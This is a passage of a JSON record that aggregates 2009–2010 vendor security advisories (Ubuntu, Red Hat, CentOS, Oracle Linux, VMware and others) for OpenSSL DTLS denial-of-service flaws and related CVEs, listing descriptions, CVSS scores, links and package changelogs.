denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a fragment bug.\n(CVE-2009-1387)\n\nThe NSS library library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spooof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time. NOTE: the scope of this issue is currently limited because the amount of computation required is still large (CVE-2009-2409).\n\nA regression was found with the self signed certificate signatures checking after applying the fix for CVE-2009-2409. An upstream patch has been applied to address this issue.\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0 customers\n\nThe updated packages have been patched to prevent this.", "published": "2009-12-04T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=42996", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-2409", "CVE-2009-1387", "CVE-2009-1378"], "lastseen": "2017-10-29T13:45:05"}], "ubuntu": [{"id": "USN-792-1", "type": "ubuntu", "title": "OpenSSL vulnerabilities", "description": "It was discovered that OpenSSL did not limit the number of DTLS records it would buffer when they arrived with a future epoch. A remote attacker could cause a denial of service via memory resource consumption by sending a large number of crafted requests. (CVE-2009-1377)\n\nIt was discovered that OpenSSL did not properly free memory when processing DTLS fragments. A remote attacker could cause a denial of service via memory resource consumption by sending a large number of crafted requests. (CVE-2009-1378)\n\nIt was discovered that OpenSSL did not properly handle certain server certificates when processing DTLS packets. A remote DTLS server could cause a denial of service by sending a message containing a specially crafted server certificate. (CVE-2009-1379)\n\nIt was discovered that OpenSSL did not properly handle a DTLS ChangeCipherSpec packet when it occured before ClientHello. A remote attacker could cause a denial of service by sending a specially crafted request. (CVE-2009-1386)\n\nIt was discovered that OpenSSL did not properly handle out of sequence DTLS handshake messages. A remote attacker could cause a denial of service by sending a specially crafted request. (CVE-2009-1387)", "published": "2009-06-25T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://usn.ubuntu.com/792-1/", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378"], "lastseen": "2018-03-29T18:19:42"}], "redhat": [{"id": "RHSA-2009:1335", "type": "redhat", "title": "(RHSA-2009:1335) Moderate: openssl security, bug fix, and enhancement update", "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a full-strength\ngeneral purpose cryptography library. Datagram TLS (DTLS) is a protocol\nbased on TLS that is capable of securing datagram transport (for example,\nUDP).\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS\nimplementation. A remote attacker could use these flaws to cause a DTLS\nserver to use excessive amounts of memory, or crash on an invalid memory\naccess or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use DTLS. Red Hat does not\nship any DTLS client or server applications in Red Hat Enterprise Linux.\n\nAn input validation flaw was found in the handling of the BMPString and\nUniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex()\nfunction. An attacker could use this flaw to create a specially-crafted\nX.509 certificate that could cause applications using the affected function\nto crash when printing certificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped with Red\nHat Enterprise Linux calls this function, for example.\n\nThese updated packages also fix the following bugs:\n\n* \"openssl smime -verify -in\" verifies the signature of the input file and\nthe \"-verify\" switch expects a signed or encrypted input file. Previously,\nrunning openssl on an S/MIME file that was not encrypted or signed caused\nopenssl to segfault. With this update, the input file is now checked for a\nsignature or encryption. Consequently, openssl now returns an error and\nquits when attempting to verify an unencrypted or unsigned S/MIME file.\n(BZ#472440)\n\n* when generating RSA keys, pairwise tests were called even in non-FIPS\nmode. This prevented small keys from being generated. With this update,\ngenerating keys in non-FIPS mode no longer calls the pairwise tests and\nkeys as small as 32-bits can be generated in this mode. Note: In FIPS mode,\npairwise tests are still called and keys generated in this mode must still\nbe 1024-bits or larger. (BZ#479817)\n\nAs well, these updated packages add the following enhancements:\n\n* both the libcrypto and libssl shared libraries, which are part of the\nOpenSSL FIPS module, are now checked for integrity on initialization of\nFIPS mode. (BZ#475798)\n\n* an issuing Certificate Authority (CA) allows multiple certificate\ntemplates to inherit the CA's Common Name (CN). Because this CN is used as\na unique identifier, each template had to have its own Certificate\nRevocation List (CRL). With this update, multiple CRLs with the same\nsubject name can now be stored in a X509_STORE structure, with their\nsignature field being used to distinguish between them. (BZ#457134)\n\n* the fipscheck library is no longer needed for rebuilding the openssl\nsource RPM. (BZ#475798)\n\nOpenSSL users should upgrade to these updated packages, which resolve these\nissues and add these enhancements.", "published": "2009-09-02T13:47:12", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://access.redhat.com/errata/RHSA-2009:1335", "cvelist": ["CVE-2006-7250", "CVE-2009-0590", "CVE-2009-1377", "CVE-2009-1378", "CVE-2009-1379", "CVE-2009-1386", "CVE-2009-1387"], "lastseen": "2017-09-09T07:19:26"}], "centos": [{"id": "CESA-2009:1335", "type": "centos", "title": "openssl security update", "description": "**CentOS Errata and Security Advisory** CESA-2009:1335\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a full-strength\ngeneral purpose cryptography library. Datagram TLS (DTLS) is a protocol\nbased on TLS that is capable of securing datagram transport (for example,\nUDP).\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS\nimplementation. A remote attacker could use these flaws to cause a DTLS\nserver to use excessive amounts of memory, or crash on an invalid memory\naccess or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use DTLS. Red Hat does not\nship any DTLS client or server applications in Red Hat Enterprise Linux.\n\nAn input validation flaw was found in the handling of the BMPString and\nUniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex()\nfunction. An attacker could use this flaw to create a specially-crafted\nX.509 certificate that could cause applications using the affected function\nto crash when printing certificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped with Red\nHat Enterprise Linux calls this function, for example.\n\nThese updated packages also fix the following bugs:\n\n* \"openssl smime -verify -in\" verifies the signature of the input file and\nthe \"-verify\" switch expects a signed or encrypted input file. Previously,\nrunning openssl on an S/MIME file that was not encrypted or signed caused\nopenssl to segfault. With this update, the input file is now checked for a\nsignature or encryption. Consequently, openssl now returns an error and\nquits when attempting to verify an unencrypted or unsigned S/MIME file.\n(BZ#472440)\n\n* when generating RSA keys, pairwise tests were called even in non-FIPS\nmode. This prevented small keys from being generated. With this update,\ngenerating keys in non-FIPS mode no longer calls the pairwise tests and\nkeys as small as 32-bits can be generated in this mode. Note: In FIPS mode,\npairwise tests are still called and keys generated in this mode must still\nbe 1024-bits or larger. (BZ#479817)\n\nAs well, these updated packages add the following enhancements:\n\n* both the libcrypto and libssl shared libraries, which are part of the\nOpenSSL FIPS module, are now checked for integrity on initialization of\nFIPS mode. (BZ#475798)\n\n* an issuing Certificate Authority (CA) allows multiple certificate\ntemplates to inherit the CA's Common Name (CN). Because this CN is used as\na unique identifier, each template had to have its own Certificate\nRevocation List (CRL). With this update, multiple CRLs with the same\nsubject name can now be stored in a X509_STORE structure, with their\nsignature field being used to distinguish between them. (BZ#457134)\n\n* the fipscheck library is no longer needed for rebuilding the openssl\nsource RPM. (BZ#475798)\n\nOpenSSL users should upgrade to these updated packages, which resolve these\nissues and add these enhancements.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-September/016149.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-September/016150.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\n\n**Upstream details at:**\n", "published": "2009-09-15T19:42:01", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2009-September/016149.html", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2006-7250", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "lastseen": "2017-10-03T18:24:51"}], "oraclelinux": [{"id": "ELSA-2009-1335", "type": "oraclelinux", "title": "openssl security, bug fix, and enhancement update", "description": "[0.9.8e-12]\n- abort if selftests failed and random number generator is polled\n- mention EVP_aes and EVP_sha2xx routines in the manpages\n- add README.FIPS\n[0.9.8e-10]\n- fix CVE-2009-1386 CVE-2009-1387 (DTLS DoS problems)\n (#503685, #503688)\n[0.9.8e-9]\n- fix CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n (DTLS DoS problems) (#501253, #501254, #501572)\n[0.9.8e-8]\n- support multiple CRLs with same subject in a store (#457134)\n- fix CVE-2009-0590 - reject incorrectly encoded ASN.1 strings (#492304)\n- seed FIPS rng directly from kernel random device\n- do not require fipscheck to build the package (#475798)\n- call pairwise key tests in FIPS mode only (#479817)\n- do not crash when parsing bad mime data (#472440)", "published": "2009-09-08T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://linux.oracle.com/errata/ELSA-2009-1335.html", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2006-7250", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "lastseen": "2016-09-04T11:15:57"}], "vmware": [{"id": "VMSA-2010-0004", "type": "vmware", "title": "ESX Service Console and vMA third party updates", "description": "a. vMA and Service Console update for newt to 0.52.2-12.el5_4.1 \n \nNewt is a programming library for color text mode, widget based user interfaces. Newt can be used to add stacked windows, entry widgets, checkboxes, radio buttons, labels, plain text fields, scrollbars, etc., to text mode user interfaces. \nA heap-based buffer overflow flaw was found in the way newt processes content that is to be displayed in a text dialog box. A local attacker could issue a specially-crafted text dialog box display request (direct or via a custom application), leading to a denial of service (application crash) or, potentially, arbitrary code execution with the privileges of the user running the application using the newt library. \nThe Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-2905 to this issue. \nThe following table lists what action remediates the vulnerability (column 4) if a solution is available. \n\n", "published": "2010-03-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.vmware.com/security/advisories/VMSA-2010-0004.html", "cvelist": ["CVE-2009-3613", "CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-3621", "CVE-2008-4316", "CVE-2009-3726", "CVE-2008-3916", "CVE-2009-3563", "CVE-2009-1387", "CVE-2009-0115", "CVE-2009-2904", "CVE-2009-1378", "CVE-2009-0590", "CVE-2008-4552", "CVE-2009-3547", "CVE-2009-2905", "CVE-2009-3620", "CVE-2009-2908", "CVE-2009-3720", "CVE-2009-1189", "CVE-2009-3228", "CVE-2009-3560", "CVE-2009-3286", "CVE-2009-3612", "CVE-2009-2695", "CVE-2009-4022", "CVE-2009-2849"], "lastseen": "2016-09-04T11:19:24"}, {"id": "VMSA-2010-0009", "type": "vmware", "title": "ESXi utilities and ESX Service Console third party updates", "description": "a. Service Console update for COS kernel \n \nUpdated COS package \"kernel\" addresses the security issues that are fixed through versions 2.6.18-164.11.1. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228, CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues fixed in kernel 2.6.18-164.6.1 \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621, CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537, CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1 \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080, CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020, CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to the security issues fixed in kernel 2.6.18-164.11.1. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "published": "2010-05-27T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.vmware.com/security/advisories/VMSA-2010-0009.html", "cvelist": ["CVE-2009-3613", "CVE-2009-3556", "CVE-2009-1386", "CVE-2009-4537", "CVE-2009-1379", "CVE-2009-3939", "CVE-2009-1377", "CVE-2009-4272", "CVE-2009-3621", "CVE-2009-3726", "CVE-2009-2910", "CVE-2009-4355", "CVE-2009-4141", "CVE-2009-2409", "CVE-2009-3563", "CVE-2009-1387", "CVE-2010-0001", "CVE-2007-4567", "CVE-2010-0382", "CVE-2009-1378", "CVE-2010-0290", "CVE-2009-0590", "CVE-2009-3080", "CVE-2009-4538", "CVE-2009-3547", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3620", "CVE-2010-0426", "CVE-2009-4536", "CVE-2010-0427", "CVE-2009-2908", "CVE-2009-1384", "CVE-2009-3228", "CVE-2009-3889", "CVE-2010-0097", "CVE-2009-4212", "CVE-2009-4021", "CVE-2009-3286", "CVE-2009-3612", "CVE-2009-3736", "CVE-2009-4138", "CVE-2009-2695"], "lastseen": "2016-09-04T11:19:30"}]}}